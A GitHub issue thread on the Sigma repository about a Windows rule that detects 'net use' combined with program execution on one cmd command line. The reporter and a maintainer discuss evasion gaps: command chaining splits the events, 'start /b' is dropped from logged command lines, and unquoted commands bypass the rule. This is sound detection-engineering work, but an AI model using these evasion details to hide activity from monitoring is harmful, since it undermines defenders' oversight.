Issues found in proc_creation_win_cmd_net_use_and_exec_combo.yml #5141
Comments
|
Welcome @DanielKoifman 👋 It looks like this is your first issue on the Sigma rules repository! The following repository accepts issues related to If you're reporting an issue related to the pySigma library please consider submitting it here If you're reporting an issue related to the deprecated sigmac library please consider submitting it here Thanks for taking the time to open this issue, and welcome to the Sigma community! 😃 |
|
As explained here. The rule is looking for a full command with quotes. We are aware of the effect of cmd.exe and how commands are treated. Hence this is a best case detection. It can be bypassed by not using quotes but for that we have other coverage. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hi team, I have a question/finding regarding https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml
The rule relies on the commandLine including ALL of the following:
The problem here is that because the commandLine in the associated reference source
includes && and &, which, similarly to the pipe character, will split the command into different event logs and not a single one.
This can be easily simulated if I run the following command:
Which will result in three different event logs:
Additionally, using "start /b" in the CMD does not log it. For example, running "start /b myFile.exe" will result in "Process Command Line: myFile.exe"
In this article, it also supports this finding:
I wasn't sure what would be the best way to fix it, so I created an issue instead of a PR.
Thank you in advance!
The text was updated successfully, but these errors were encountered: